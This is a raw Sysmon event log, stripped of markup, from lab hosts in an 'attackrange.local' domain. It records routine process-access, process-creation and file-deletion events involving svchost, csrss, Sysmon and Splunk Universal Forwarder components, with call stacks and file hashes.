07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806659Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.612{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.598{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B9C421365317242B8F54C677C3C8D3,SHA256=4EFCA8179D1152E166FDA6C87E6BC58FBBC3A08CAAAC09863DB0684E32D67B17,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=614C44CE2B69CE95EECC79F1571E4C21,SHA256=6FF453CAF1C579F6E5C0D0F03B716D22EF9733193D52F117CBA29431B6B8025D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9152998C636D4F6CE5F156BE1EE6AFD0,SHA256=7A88081DB62DFF3F0ADCDC6C60ABC5385D38E1140AF72BDACF7B51D8B61E39A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98F1F3858319E367303577E6BAAA10F,SHA256=710CE96A3909DCB8360A4E4FA07E11320E704DC33D281C23990032F4754E4A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.972{0C1E0330-F38E-60EB-5479-00000000D001}40483920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000806697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.817{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=614C44CE2B69CE95EECC79F1571E4C21,SHA256=6FF453CAF1C579F6E5C0D0F03B716D22EF9733193D52F117CBA29431B6B8025D,IMPHASH=00000000000000000000000000000000falsetrue 